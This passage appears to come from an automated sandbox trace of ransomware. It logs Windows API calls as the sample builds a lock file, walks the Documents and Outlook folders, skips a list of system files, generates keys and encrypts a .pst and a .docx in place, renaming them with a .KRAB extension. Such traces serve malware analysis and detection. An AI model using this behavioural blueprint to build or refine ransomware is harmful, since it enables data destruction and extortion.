DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.714] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.715] CloseHandle (hObject=0x434) returned 1 [0091.715] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.715] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.716] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x395)) [0091.716] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.716] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.716] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.716] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock") returned 69 [0091.716] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.737] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\") returned 46 [0091.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*" [0091.738] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd920 [0091.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.738] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.738] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.738] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.738] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0091.738] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0091.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock" [0091.738] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.739] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 74 [0091.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a08d2ca4dee3d.lock") returned 69 [0091.739] lstrlenW (lpString=".lock") returned 5 [0091.739] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.739] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0091.739] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.740] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.740] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.740] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt" [0091.740] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.740] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt.KRAB") returned 67 [0091.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt") returned 62 [0091.740] lstrlenW (lpString=".txt") returned 4 [0091.740] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.740] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.741] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt") returned 62 [0091.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\KRAB-DECRYPT.txt") returned 62 [0091.741] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.741] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.804] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.805] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.805] lstrcmpW (lpString1="lcfkj@kiekc.df.pst", lpString2=".") returned 1 [0091.805] lstrcmpW (lpString1="lcfkj@kiekc.df.pst", lpString2="..") returned 1 [0091.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="lcfkj@kiekc.df.pst" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" [0091.805] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.805] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst.KRAB") returned 69 [0091.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.806] lstrlenW (lpString=".pst") returned 4 [0091.806] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.806] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pst ") returned 5 [0091.806] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.806] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="desktop.ini") returned 1 [0091.806] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="autorun.inf") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntuser.dat") returned -1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="iconcache.db") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="bootsect.bak") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="boot.ini") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntuser.dat.log") returned -1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="thumbs.db") returned -1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="KRAB-DECRYPT.html") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntldr") returned -1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="NTDETECT.COM") returned -1 [0091.807] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="Bootfont.bin") returned 1 [0091.807] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.807] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0091.808] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.808] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.809] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.809] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0091.809] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.809] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.809] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0091.810] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.810] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.810] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.810] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0091.810] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0091.810] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.811] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0091.811] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0091.811] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0091.811] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0091.812] GetLastError () returned 0x0 [0091.812] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.812] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0091.812] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0091.812] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0091.812] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0091.812] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0091.813] GetLastError () returned 0x0 [0091.813] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.813] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.813] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0091.814] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.814] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.814] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x42400, lpOverlapped=0x0) returned 1 [0091.868] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffbdc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.873] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x42400, lpOverlapped=0x0) returned 1 [0091.878] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0091.878] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.895] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.896] CloseHandle (hObject=0x3a8) returned 1 [0091.896] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.896] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst.krab")) returned 1 [0091.897] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.898] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0091.898] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0091.898] CloseHandle (hObject=0x434) returned 1 [0091.898] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.898] lstrcmpW (lpString1="PDlJyaZFT.docx", lpString2=".") returned 1 [0091.898] lstrcmpW (lpString1="PDlJyaZFT.docx", lpString2="..") returned 1 [0091.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="PDlJyaZFT.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx" [0091.898] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.898] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx.KRAB") returned 51 [0091.898] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx") returned 46 [0091.899] lstrlenW (lpString=".docx") returned 5 [0091.899] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.899] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0091.899] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx") returned 46 [0091.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx") returned 46 [0091.899] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="desktop.ini") returned 1 [0091.899] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="autorun.inf") returned 1 [0091.899] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="ntuser.dat") returned 1 [0091.899] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="iconcache.db") returned 1 [0091.899] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="bootsect.bak") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="boot.ini") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="ntuser.dat.log") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="thumbs.db") returned -1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="ntldr") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="NTDETECT.COM") returned 1 [0091.900] lstrcmpiW (lpString1="PDlJyaZFT.docx", lpString2="Bootfont.bin") returned 1 [0091.900] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.900] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0091.901] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.901] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.901] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.901] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.901] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.902] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.902] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0091.903] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.905] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.905] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.906] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.906] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.906] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.906] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0091.907] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0091.907] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.907] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.909] GetLastError () returned 0x0 [0091.909] CryptDestroyKey (hKey=0xfbd920) returned 1 [0091.909] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.910] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0091.910] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0091.910] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.910] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.910] GetLastError () returned 0x0 [0091.911] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0091.911] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0091.911] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pdljyazft.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.928] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.928] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.928] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15fdb, lpOverlapped=0x0) returned 1 [0091.943] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffea025, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.943] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15fdb, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15fdb, lpOverlapped=0x0) returned 1 [0091.943] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.943] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.949] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.950] CloseHandle (hObject=0x434) returned 1 [0091.950] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.950] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pdljyazft.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\PDlJyaZFT.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pdljyazft.docx.krab")) returned 1 [0091.951] VirtualFree (lpAddress=0x2f30000, 